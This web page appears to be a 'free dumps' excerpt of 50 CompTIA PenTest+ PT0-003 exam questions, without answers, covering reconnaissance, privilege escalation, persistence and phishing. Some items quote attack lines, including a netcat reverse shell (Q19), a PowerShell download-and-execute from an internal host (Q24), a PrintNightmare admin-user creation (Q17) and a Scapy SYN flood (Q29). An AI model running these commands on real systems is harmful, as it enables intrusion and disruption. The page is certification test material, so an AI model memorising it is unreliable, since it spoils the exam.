Visit PT0-003 Free Dumps (Part 2, Q41-Q90) of V10.02 to Verify the Quality: Crush the CompTIA PenTest+ Certification Exam with DumpsBase’s Latest Dumps

1. During a vulnerability assessment, a penetration tester configures the scanner sensor and performs the initial vulnerability scanning under the client's internal network. The tester later discusses the results with the client, but the client does not accept the results. The client indicates the host and assets that were within scope are not included in the vulnerability scan results.

Which of the following should the tester have done?

2. Which of the following describes the process of determining why a vulnerability scanner is not providing results?

3. During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses.

Which of the following tools should the tester use?

4. During an external penetration test, a tester receives the following output from a tool:

test.comptia.org

info.comptia.org

vpn.comptia.org

exam.comptia.org

Which of the following commands did the tester most likely run to get these results?

5. A penetration tester is developing the rules of engagement for a potential client.

Which of the following would most likely be a function of the rules of engagement?

6. A penetration tester needs to complete cleanup activities from the testing lead.

Which of the following should the tester do to validate that reverse shell payloads are no longer running?

7. A penetration testing team wants to conduct DNS lookups for a set of targets provided by the client.

The team crafts a Bash script for this task.

However, they find a minor error in one line of the script:

1 #!/bin/bash

2 for i in $(cat example.txt); do

3 curl $i

4 done

Which of the following changes should the team make to line 3 of the script?

8. A penetration tester needs to test a very large number of URLs for public access.

Given the following code snippet:

1 import requests

2 import pathlib

3

4 for url in pathlib.Path("urls.txt").read_text().split("n"):

5 response = requests.get(url)

6 if response.status == 401:

7 print("URL accessible")

Which of the following changes is required?

9. As part of an engagement, a penetration tester wants to maintain access to a compromised system after rebooting.

Which of the following techniques would be best for the tester to use?

10. In a file stored in an unprotected source code repository, a penetration tester discovers the following line of code:

sshpass -p donotchange ssh [email protected]

Which of the following should the tester attempt to do next to take advantage of this information? (Select two).

11. During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software.

Which of the following host-based attacks should the tester use?

12. A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past.

Which of the following tools should the penetration tester use?

13. During the reconnaissance phase, a penetration tester collected the following information from the DNS records:

A-----> www

A-----> host

TXT --> vpn.comptia.org

SPF---> ip =2.2.2.2

Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?

14. A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only.

Which of the following would be most appropriate to avoid alerting the SOC?

15. A penetration tester gains access to a domain server and wants to enumerate the systems within the domain.

Which of the following tools would provide the best oversight of domains?

16. A penetration tester plans to conduct reconnaissance during an engagement using readily available resources.

Which of the following resources would most likely identify hardware and software being utilized by the client?

17. During an assessment, a penetration tester manages to get RDP access via a low-privilege user.

The tester attempts to escalate privileges by running the following commands:

Import-Module .PrintNightmare.ps1

Invoke-Nightmare -NewUser "hacker" -NewPassword "Password123!" -DriverName "Print"

The tester attempts to further enumerate the host with the new administrative privileges by using the runas command. However, the access level is still low.

Which of the following actions should the penetration tester take next?

18. A tester is performing an external phishing assessment on the top executives at a company. Two-factor authentication is enabled on the executives’ accounts that are in the scope of work.

Which of the following should the tester do to get access to these accounts?

19. A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability.

The tester uses the following command:

nc -e /bin/sh 10.10.10.16 4444

Which of the following would most likely bypass the filtered space character?

20. A penetration tester needs to identify all vulnerable input fields on a customer website.

Which of the following tools would be best suited to complete this request?

21. A penetration tester enumerates a legacy Windows host on the same subnet. The tester needs to select exploit methods that will have the least impact on the host's operating stability.

Which of the following commands should the tester try first?

22. A penetration tester executes multiple enumeration commands to find a path to escalate privileges.

Given the following command:

find / -user root -perm -4000 -exec ls -ldb {} ; 2>/dev/null

Which of the following is the penetration tester attempting to enumerate?

23. A penetration tester creates a list of target domains that require further enumeration.

The tester writes the following script to perform vulnerability scanning across the domains:

line 1: #!/usr/bin/bash

line 2: DOMAINS_LIST = "/path/to/list.txt"

line 3: while read -r i; do

line 4: nikto -h $i -o scan-$i.txt &

line 5: done

The script does not work as intended.

Which of the following should the tester do to fix the script?

24. Given the following script:

$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("")[1] If ($1 -eq "administrator") {

echo IEX(New-Object Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1') | powershell -noprofile -}

Which of the following is the penetration tester most likely trying to do?

25. A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com.

Which of the following is the best command for the tester to use?

26. While performing an internal assessment, a tester uses the following command:

crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@

Which of the following is the main purpose of the command?

27. A penetration tester gains access to a Windows machine and wants to further enumerate users with native operating system credentials.

Which of the following should the tester use?

28. Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

29. A penetration tester is authorized to perform a DoS attack against a host on a network.

Given the following input:

ip = IP("192.168.50.2")

tcp = TCP(sport=RandShort(), dport=80, flags="S")

raw = RAW(b"X"*1024)

p = ip/tcp/raw

send(p, loop=1, verbose=0)

Which of the following attack types is most likely being used in the test?

30. Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?

31. During a security assessment, a penetration tester needs to exploit a vulnerability in a wireless network's authentication mechanism to gain unauthorized access to the network.

Which of the following attacks would the tester most likely perform to gain access?

32. A penetration tester is testing a power plant's network and needs to avoid disruption to the grid.

Which of the following methods is most appropriate to identify vulnerabilities in the network?

33. A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts.

Based on the targets' EPSS and CVSS scores, which of the following targets is the most likely to get attacked?

Host | CVSS | EPSS

34. A penetration tester discovers evidence of an advanced persistent threat on the network that is being tested.

Which of the following should the tester do next?

35. A penetration tester needs to evaluate the order in which the next systems will be selected for testing.

Given the following output:

Hostname | IP address | CVSS 2.0 | EPSS

hrdatabase | 192.168.20.55 | 9.9 | 0.50

financesite | 192.168.15.99 | 8.0 | 0.01

legaldatabase | 192.168.10.2 | 8.2 | 0.60

fileserver | 192.168.125.7 | 7.6 | 0.90

Which of the following targets should the tester select next?

36. During an engagement, a penetration tester wants to enumerate users from Linux systems by using finger and rwho commands. However, the tester realizes these commands alone will not achieve the desired result.

Which of the following is the best tool to use for this task?

37. A penetration tester wants to check the security awareness of specific workers in the company with targeted attacks.

Which of the following attacks should the penetration tester perform?

38. A penetration tester wants to create a malicious QR code to assist with a physical security assessment.

Which of the following tools has the built-in functionality most likely needed for this task?

39. A penetration tester needs to help create a threat model of a custom application.

Which of the following is the most likely framework the tester will use?

40. During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections.

Which of the following command-line utilities built into Windows is most likely to disable the firewall?

41. A penetration tester is performing network reconnaissance. The tester wants to gather information about the network without causing detection mechanisms to flag the reconnaissance activities.

Which of the following techniques should the tester use?

42. After a recent penetration test was conducted by the company's penetration testing team, a systems administrator notices the following in the logs:

2/10/2023 05:50AM C:usersmgraniteschtasks /query 2/10/2023 05:53AM C:usersmgraniteschtasks /CREATE /SC DAILY

Which of the following best explains the team's objective?

43. A penetration tester is conducting a vulnerability scan. The tester wants to see any vulnerabilities that may be visible from outside of the organization.

Which of the following scans should the penetration tester perform?

44. A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week.

Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).

45. A penetration tester is conducting reconnaissance for an upcoming assessment of a large corporate client. The client authorized spear phishing in the rules of engagement.

Which of the following should the tester do first when developing the phishing campaign?

46. A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester's machine.

Which of the following commands should the tester use to do this task from the tester's host?

47. A penetration tester needs to confirm the version number of a client's web application server.

Which of the following techniques should the penetration tester use?

48. While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system.

Which of the following is most likely responsible for this observation?

49. A tester runs an Nmap scan against a Windows server and receives the following results:

Nmap scan report for win_dns.local (10.0.0.5)

Host is up (0.014s latency)

Port State Service

53/tcp open domain

161/tcp open snmp

445/tcp open smb-ds

3389/tcp open rdp

Which of the following TCP ports should be prioritized for using hash-based relays?

50. During an assessment, a penetration tester runs the following command:

setspn.exe -Q /

Which of the following attacks is the penetration tester preparing for?